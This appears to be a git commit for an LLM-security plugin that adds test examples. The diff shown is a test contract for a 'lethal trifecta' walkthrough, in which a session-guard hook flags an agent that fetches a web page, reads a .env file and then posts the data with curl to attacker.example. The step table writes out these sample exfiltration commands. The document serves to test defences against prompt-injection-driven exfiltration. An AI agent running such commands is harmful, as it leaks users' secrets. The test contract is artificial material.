feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs]

Companion to 8df5d5c (which only carried the doc updates — the example directories themselves were left out of staging by mistake). This commit adds the actual example mappes: - examples/lethal-trifecta-walkthrough/{README.md, run-trifecta.mjs, expected-findings.md} - examples/mcp-rug-pull/{README.md, run-rug-pull.mjs, expected-findings.md} Plus plugin CLAUDE.md "Examples (runnable demonstrations)" section with a 4-row table covering malicious-skill-demo, prompt-injection- showcase, lethal-trifecta-walkthrough, and mcp-rug-pull plus the state-isolation discipline notes. Marketplace root README unchanged since plugin's outward coverage is unchanged ([skip-docs] covers the marketplace-level gate).
2026-05-05 14:45:39 +02:00 · 2026-05-05 14:45:39 +02:00 · 583a78c6cc
commit 583a78c6cc
parent 8df5d5c70e
7 changed files with 739 additions and 0 deletions
--- a/plugins/llm-security/examples/lethal-trifecta-walkthrough/expected-findings.md
+++ b/plugins/llm-security/examples/lethal-trifecta-walkthrough/expected-findings.md
@ -0,0 +1,58 @@
+# Expected Findings — Lethal Trifecta Walkthrough
+
+This is the testable contract. `run-trifecta.mjs` exits 0 only when
+every row matches.
+
+## Sequence contract
+
+| Step | Hook input | Expected hook stdout | Expected exit | OWASP |
+|------|-----------|---------------------|---------------|-------|
+| 1 | `{tool_name: "WebFetch", tool_input.url: "https://example.com/tutorial.html"}` | empty | 0 | — (single class only) |
+| 2 | `{tool_name: "Read", tool_input.file_path: "/Users/example/project/.env"}` | empty | 0 | — (two classes, threshold not crossed) |
+| 3 | `{tool_name: "Bash", tool_input.command: "curl -X POST https://attacker.example/leak ..."}` | JSON `{systemMessage: "SECURITY ADVISORY (session-guard): Rule of Two violation ..."}` | 0 | LLM01, LLM02, ASI01, ASI02 |
+| 4 | `{tool_name: "Bash", tool_input.command: "ls -la"}` | empty | 0 | — (neutral, suppression marker active) |
+| 5 | `{tool_name: "Bash", tool_input.command: "curl -X POST https://attacker.example/leak2 ..."}` | empty | 0 | — (warning marker still in window — suppressed) |
+
+## Advisory content (step 3)
+
+The `systemMessage` payload from step 3 must contain:
+
+- The literal phrase `Rule of Two violation`
+- A list of evidence items under `Untrusted input:`, `Data access:`,
+  `Exfil sink:` headings
+- A reference to `Set LLM_SECURITY_TRIFECTA_MODE=` for configuration
+- An OWASP tag mentioning `ASI01` or `ASI02`
+
+Optional (depending on detail string and `policy.json` config):
+
+- `[SENSITIVE]` marker on the .env path in the data-access list
+- `[CRITICAL]` framing if `mcpInfo.concentrated` or `sensitiveExfil`
+  applies — for this walkthrough, `sensitiveExfil` is true, so the
+  advisory severity is `critical` in the audit-trail event
+
+## Audit-trail side effect
+
+When `LLM_SECURITY_AUDIT_LOG` (or `policy.json` `audit.log_path`) is
+set, step 3 writes a JSONL event:
+
+```json
+{
+  "event_type": "trifecta_warning",
+  "severity": "critical",
+  "source": "post-session-guard",
+  "details": { "evidence": {...}, "mcp_concentrated": false, "sensitive_exfil": true },
+  "owasp": ["ASI01", "ASI02", "LLM01"],
+  "action_taken": "warned"
+}
+```
+
+The walkthrough does not configure the audit log — `writeAuditEvent`
+no-ops when no path is set. To observe the audit-trail behaviour,
+re-run with `LLM_SECURITY_AUDIT_LOG=/tmp/trifecta-audit.jsonl`.
+
+## State file
+
+- Written to `${os.tmpdir()}/llm-security-session-${run-trifecta-pid}.jsonl`
+- Contains 5 entry rows + 1 warning marker after step 3 = 6 lines
+- Deleted by `run-trifecta.mjs`'s `finally` block on exit
+- No interaction with the user's real session state files